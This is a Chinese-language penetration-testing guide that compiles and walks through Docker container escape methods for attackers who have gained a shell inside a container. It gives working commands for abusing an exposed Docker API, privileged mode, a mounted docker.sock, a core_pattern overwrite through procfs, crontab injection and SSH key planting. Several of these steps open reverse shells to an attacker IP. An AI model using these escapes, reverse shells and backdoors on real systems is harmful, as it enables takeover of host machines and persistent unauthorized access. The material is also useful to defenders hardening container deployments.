当涉及到容器技术和应用程序隔离时,Docker是一个被广泛采用的解决方案,其使得应用程序的部署变得更加简单高效。然而,作为攻击者,在实际渗透时,好不容易拿到了一个shell,但是却发现所处的环境在docker容器里面,导致很多常见命令无法执行,这时还是挺难受的。所以,我们对目前网上提到了大部分docker逃逸手法做了汇总复现,希望师傅们在阅读后,碰到此类情况能顺利拿到宿主机的权限。
docker
docker远程API未授权访问逃逸
docker远程api可以执行docker命令,若配置错误将其暴露在公网,攻击者可通过远程调用 Docker API直接管理容器,进而导致逃逸getshell
访问2375端口,如果出现如下页面,即存在docker远程API未授权:
使用如下命令可远程连接docker
sudo docker -H 192.168.111.20:2375 images通过如下命令可以新运行一个容器,将服务器的根目录挂载至/host目录:
sudo docker -H 192.168.111.20:2375 run -it -v /:/host ubuntu:18.04 /bin/bash使用chroot 即可实现逃逸到宿主机
chroot /host/特权模式privileged逃逸
特权模式逃逸 (Privileged Mode Escape) 是容器安全中最经典、最直接,也是危害最大的逃逸方式之一。如果一个容器以--privileged 参数启动,它几乎拥有了和宿主机(Host)一样的权限。攻击者一旦攻入这个容器,就可以利用这些特权轻松“越狱”,控制整个宿主机。
执行如下命令,若CapEff值为0000003fffffffff,则证明为特权模式启动:
cat /proc/self/status | grep CapEff
CapEff: 0000003fffffffff使用fdisk命令列出系统中所有磁盘设备的分区信息:
fdisk -l这里可以看到,/dev/sda5是容器内挂载的宿主机磁盘:
在容器内挂载宿主机磁盘:
mkdir /hostmount /dev/sda5 /host
使用chroot /host即可完成逃逸到宿主机:
chroot /host成功逃逸:
挂载docker.sock逃逸
Docker Socket是Docker守护进程监听的Unix域套接字,如果在攻击者可控的容器内挂载了该套接字文件(/var/run/docker.sock),可通过Docker Socket与Docker守护进程通信,发送命令创建并运行一个新的容器,将宿主机的根目录挂载到新创建的容器内部,实现逃逸。
先创建容器并挂载/var/run/docker.sock文件:
sudo docker -H 192.168.111.20:2375 run -it \ -v /var/run/docker.sock:/var/run/docker.sock \ -v /usr/bin/docker:/usr/bin/docker \ ubuntu:18.04 /bin/bash检查是否存在/var/run/docker.sock文件:
在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部:
docker run -it -v /:/host ubuntu:18.04 /bin/bash使用chroot /host即可完成逃逸到宿主机:
挂载宿主机procfs逃逸
procfs是Linux系统中的伪文件系统,用于动态反映系统进程和组件状态。当容器挂载宿主机的procfs时,若容器内进程具有足够权限(如root权限且未开启user namespace),攻击者可利用procfs中的敏感文件进行操作。从Linux 2.6.19内核版本开始,若core_pattern文件内容以管道符“|”开头,后续内容将被当作用户空间程序或脚本执行。攻击者可通过修改该文件,使进程崩溃时触发宿主机执行恶意脚本,从而实现逃逸。
使用find命令,如果存在core_pattern文件,则挂载了宿主机的procfs:
find / -name core_pattern在容器内查看是否能修改 core_pattern:如果显示类似 |/usr/share/apport/apport %p %s %c %d %P %E 则有权限修改,具备逃逸条件
cat /proc/sys/kernel/core_pattern寻找容器在宿主机上的绝对路径,主要看upperdir的值:
cat /proc/mounts | grep docker得到路径:
/var/lib/docker/overlay2/d6df2e92d5b1214013dc8758def5dd7becda7b570cf2d79d0562f55368c027c4/diff在容器根目录下创建脚本 /exp.sh,内容为反弹 Shell:
cat <<EOF > /exp.sh > #!/bin/bash > bash -i >& /dev/tcp/192.168.111.25/9997 0>&1 > EOF赋予执行权限
chmod +x /exp.sh将宿主机视角下的脚本路径写入
echo "|/var/lib/docker/overlay2/d6df2e92d5b1214013dc8758def5dd7becda7b570cf2d79d0562f55368c027c4/diff/exp.sh" > /proc/sys/kernel/core_pattern在攻击机上开启监听:
触发崩溃:
sleep 10 &kill -SIGSEGV $!
成功获取反弹Shell
写入Crontab定时任务逃逸
启动容器时,如果将宿主机的根目录(/)挂载到容器内部的某个目录。由于 Docker 默认以 Root 权限运行,这意味着我们在容器内拥有了对宿主机磁盘文件的全写权限。通过修改宿主机的crontab文件,即可实现从容器到宿主机的控制权转移。
创建一个特权容器并挂载宿主机根目录
sudo docker -H 192.168.111.20:2375 run -it -v /:/host --privileged ubuntu:18.04 /bin/bash容器内直接向宿主机crontab写入反弹shell命令
echo '* * * * * root bash -i >& /dev/tcp/192.168.111.25/9998 0>&1' >> /host/etc/crontab攻击机启动一个监听:
nc -lvvp 9998成功收到shell:
写入ssh公钥逃逸
这个其实跟前面写入定时任务差不多。通过向宿主机的/root/.ssh/authorized_keys写入攻击者的SSH公钥,从而实现免密登录宿主机。
攻击机生成公钥:
ssh-keygen -t rsa -b 4096 -C "backdoor@attacker.com" -f ~/.ssh/docker_escape查看生成的公钥
cat ~/.ssh/docker_escape.pub创建.ssh目录
mkdir -p /host/root/.ssh设置权限(很重要,必须设置对权限)
chmod 700 /host/root/.ssh写入公钥
cat >> /host/root/.ssh/authorized_keys << 'EOF'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAA... backdoor@attacker.comEOF
设置authorized_keys权限
chmod 600 /host/root/.ssh/authorized_keys确保所有者正确
chown root:root /host/root/.ssh/authorized_keys接下来就可以SSH直接连接宿主机了:
ssh root@192.168.111.20
